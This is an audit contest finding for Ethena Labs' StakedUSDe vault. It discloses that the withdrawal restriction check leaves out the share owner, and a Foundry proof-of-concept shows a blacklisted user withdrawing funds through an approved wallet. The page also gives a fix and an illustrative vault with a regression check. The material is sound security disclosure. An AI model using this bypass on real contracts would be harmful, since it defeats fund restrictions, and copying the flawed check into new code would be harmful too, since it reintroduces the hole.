Ethena Labs - SpicyMeatball's results

Enabling The Internet Bond

General Information

Platform: Code4rena

Start Date: 24/10/2023

Pot Size: $36,500 USDC

Total HM: 4

Participants: 147

Period: 6 days

Judge: 0xDjango

Id: 299

League: ETH

Ethena Labs

Findings Distribution

Researcher Performance

Rank: 53/147

Findings: 1

Award: $119.14

🌟 Selected for report: 0

🚀 Solo Findings: 0

Awards

119.1406 USDC - $119.14

Labels

bug
2 (Med Risk)
satisfactory
sufficient quality report
duplicate-499

External Links

Lines of code

https://github.com/code-423n4/2023-10-ethena/blob/main/contracts/StakedUSDe.sol#L225-L238

Vulnerability details

Impact

FULL_RESTRICTED_STAKER_ROLE is assigned to addresses to completely restrict them from moving their funds. The only exception is that the default admin can move funds from a blacklisted wallet to another address.

https://github.com/code-423n4/2023-10-ethena/blob/main/contracts/StakedUSDe.sol#L148

As we can see, blocked users can't transfer their vault tokens to other addresses, and no one can send tokens to them.

https://github.com/code-423n4/2023-10-ethena/blob/main/contracts/StakedUSDe.sol#L245-L252

Withdrawal is also prohibited:

https://github.com/code-423n4/2023-10-ethena/blob/main/contracts/StakedUSDe.sol#L232-L233

but there is a loophole: the check above lacks hasRole(FULL_RESTRICTED_STAKER_ROLE, owner), so it only inspects the caller and the receiver. A blacklisted user can therefore still withdraw their funds with the help of an approved caller (a spender the blacklisted owner has approved on the vault token).

Proof of Concept

```solidity
function testBlacklistWithdraw() public {
    // Give alice the blacklist manager role
    vm.prank(owner);
    stakedUSDe.grantRole(BLACKLIST_MANAGER_ROLE, alice);

    // Bob deposits 100k USDe and receives vault shares
    usdeToken.mint(bob, 100_000e18);
    vm.startPrank(bob);
    usdeToken.approve(address(stakedUSDe), 100_000e18);
    stakedUSDe.deposit(100_000e18, bob);
    vm.stopPrank();

    // Bob is fully restricted
    vm.prank(alice);
    stakedUSDe.addToBlacklist(bob, true);

    // Bob approves a fresh wallet, which then withdraws on his behalf:
    // the caller and receiver are not restricted, only the owner is
    address wallet = makeAddr("totallyNotBob");
    vm.prank(bob);
    stakedUSDe.approve(wallet, ~uint256(0));
    vm.prank(wallet);
    stakedUSDe.withdraw(100_000e18, wallet, bob);

    // The restricted user's funds have left the vault
    assertEq(usdeToken.balanceOf(wallet), 100_000e18);
}
```

Tools Used

Foundry, StakedUSDe.blacklist.t.sol

Recommended Mitigation Steps

Add || hasRole(FULL_RESTRICTED_STAKER_ROLE, owner) to the restriction check in _withdraw, so that the share owner is rejected alongside the caller and the receiver.
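As an added example that is not the project's code, the following minimal vault shows the incomplete check described above beside the hardened form, together with a regression check that follows the same approved-spender route as the PoC. The contract names, the bool blacklist mapping standing in for FULL_RESTRICTED_STAKER_ROLE, and the Spender harness are assumptions made for this illustration; the underlying asset transfer is omitted.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

// Minimal stand-in for a StakedUSDe-style vault, constructed for this example.
// Not the project's code: shares live in a plain mapping, the restricted role
// is a bool mapping instead of an AccessControl role, and the transfer of the
// underlying asset to the receiver is left out.
contract RestrictedVaultExample {
    mapping(address => uint256) public shares;
    mapping(address => mapping(address => uint256)) public allowance;
    mapping(address => bool) public fullyRestricted;
    address public immutable blacklistManager;

    error OperationNotAllowed();

    constructor() {
        blacklistManager = msg.sender;
    }

    function deposit(uint256 amount) external {
        shares[msg.sender] += amount;
    }

    function approve(address spender, uint256 amount) external {
        allowance[msg.sender][spender] = amount;
    }

    function addToBlacklist(address target) external {
        require(msg.sender == blacklistManager, "not manager");
        fullyRestricted[target] = true;
    }

    // ERC-4626-style signature: `owner` is whose shares are burned and
    // msg.sender (the caller) may be a spender the owner approved.
    function withdraw(uint256 amount, address receiver, address owner) external {
        _withdraw(msg.sender, receiver, owner, amount);
    }

    function _withdraw(address caller, address receiver, address owner, uint256 amount) internal {
        // Incomplete form (the pattern the finding describes): only caller and
        // receiver are checked, so a restricted owner who approved an
        // unrestricted spender can still have their shares withdrawn.
        //
        //   if (fullyRestricted[caller] || fullyRestricted[receiver]) revert OperationNotAllowed();
        //
        // Hardened form: the share owner is checked as well.
        if (fullyRestricted[caller] || fullyRestricted[receiver] || fullyRestricted[owner]) {
            revert OperationNotAllowed();
        }
        if (caller != owner) {
            uint256 allowed = allowance[owner][caller];
            require(allowed >= amount, "insufficient allowance");
            allowance[owner][caller] = allowed - amount;
        }
        shares[owner] -= amount;
        // Transfer of the underlying asset to `receiver` omitted.
    }
}

// Approved spender that withdraws on the owner's behalf (assumed harness).
contract Spender {
    function pull(RestrictedVaultExample vault, uint256 amount, address owner) external {
        vault.withdraw(amount, address(this), owner);
    }
}

// Regression check mirroring the PoC: this contract acts both as the blacklist
// manager (it deploys the vault) and as the depositor that gets restricted.
contract BlacklistWithdrawCheck {
    // Returns true when the approved-spender route is blocked for a restricted owner.
    function run() external returns (bool blocked) {
        RestrictedVaultExample vault = new RestrictedVaultExample();
        Spender spender = new Spender();

        vault.deposit(100e18);
        vault.approve(address(spender), type(uint256).max);
        vault.addToBlacklist(address(this));

        // With the hardened check this call reverts with OperationNotAllowed;
        // with the incomplete check it succeeds and the shares leave the owner.
        try spender.pull(vault, 100e18, address(this)) {
            blocked = false;
        } catch {
            blocked = true;
        }
    }
}
```

Deploying BlacklistWithdrawCheck and calling run() returns true with the hardened check in place; swapping in the commented-out incomplete condition makes it return false, which is the same behaviour the Foundry PoC demonstrates against the real vault.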

Assessed type

Access Control

#0 - c4-pre-sort

2023-10-31T02:05:05Z

raymondfam marked the issue as sufficient quality report

#1 - c4-pre-sort

2023-10-31T02:05:53Z

raymondfam marked the issue as duplicate of #7

#2 - c4-pre-sort

2023-11-01T19:44:42Z

raymondfam marked the issue as duplicate of #666

#3 - c4-judge

2023-11-13T19:31:28Z

fatherGoose1 marked the issue as satisfactory
